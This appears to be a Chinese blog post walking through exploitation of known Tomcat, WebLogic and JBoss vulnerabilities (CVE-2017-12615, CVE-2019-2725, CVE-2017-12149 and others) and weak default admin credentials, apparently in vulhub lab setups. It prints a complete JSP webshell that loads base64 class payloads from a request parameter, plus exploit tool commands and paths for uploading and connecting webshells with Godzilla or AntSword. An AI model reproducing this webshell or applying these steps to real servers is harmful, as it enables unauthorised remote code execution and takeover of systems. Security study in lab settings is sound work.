常见中间件漏洞

一、Tomcat

1.CVE-2017-12615

 1.1打开tomcat页面

1.2 打开burp进行抓包,修改PUT方式,后面加上一句话木马

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

1.3上传木马后进入这个jsp页面,burp放行

1.4打开中国蚁剑测试连接

2.后台弱口令部署war包

2.1打开tomcat页面点击左边的manager app,输入弱口令tomcat/tomcat

2.2进入manager页面

2.3打开哥斯拉生成一个jsp木马,我们压缩成zip文件再修改后缀为war

2.4我们选择这个war文件点击deploy

2.5我们再打开这个jsp文件

2.6最后打开哥斯拉进行连接测试

3.CVE-2020-1938

3.1 先搭建好环境

3.2打开kali下载cve2020-1938

3.3右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip

二、Weblogic

1.后台弱口令getshell

1.1进入环境在地址栏后输入/console进入登录页面

1.2输入弱口令登录

1.3进入页面后点击部署点击安装

1.4点击上载文件

1.5上传一个jsp木马,先压缩为zip再修改格式为war

1.6进入后访问你植入的木马,没有报错证明注入成功

1.7打开哥斯拉测试连接

2.CVE-2017-3506

2.1打开工具进行漏洞检测

2.2点击命令执行查看whoami

2.3点击文件上传,把jsp木马复制进去点击上传

2.4查看下方出现木马上传成功,打开他给出的地址

2.5没有回显证明木马上传成功

2.6打开哥斯拉测试连接成功

3 CVE-2019-2725

3.1漏洞验证如果出现以下页面代表存在漏洞

3.2打开burp对当前页面进行抓包

3.3上传到重放器发送显示202代表成功

3.4进入写入木马的jsp文件

3.5打开哥斯拉测试连接

4. CVE-2018-2628

4.1进入环境

4.2使用工具对网站进行检测

4.3上传一个jsp木马

4.4打开这个木马文件

4.5打开哥斯拉测试连接

5.CVE-2018-2894

5.1搭建环境在地址栏后输入console

5.2输入账号密码进入后台系统

5.3点击base_domain下的高级启用web服务测试页

5.4保存后进入ws_utc/config.do

5.5修改当前工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

5.6点击安全设置名字密码,上传一个木马文件

5.7审查元素找到对应时间戳

5.8

http://ip地址/ws_utc/css/config/keystore/时间戳_⽂件名.jsp

5.9

三、Jboss

1.CVE-2015-7501

1.1

1.2在地址栏后添加/invoker/JXInvokerServlet下载文件

1.3下载ysoserial ⼯具进⾏漏洞利⽤

Release v0.0.6 · frohoff/ysoserial · GitHub

1.4

2.CVE-2017-7504

2.1访问漏洞地址

2.2

使用工具运行python3 jexboss.py -u http://IP地址/

进入shell

3 CVE-2017-12149

3.1访问漏洞⻚⾯

3.2验证是否存在漏洞,该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

3.3打开jboss反序列化软件 将网址放入 cmd内输入想执行的代码

4.Administration Console弱⼝令

4.1搭建环境

4.2

在地址栏后输入admin-console/login.seam?conversationId=4进入后台登录页面

4.3 弱口令admin/vulhub登录

4.4点击web应用

4.5上传一个jsp木马

4.6进入木马页面

4.7测试连接成功

5.低版本JMX Console未授权

5.1搭建环境

5.2输入admin/vulhub进入页面

5.3点击左侧jboss.deployment

5.4找到⻚⾯中的addURL() 选项远程加载war包来部署

5.5上传一个war包,点击invoke

5.6没有回显证明木马注入成功

5.7测试连接发现连接成功

  • 49
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值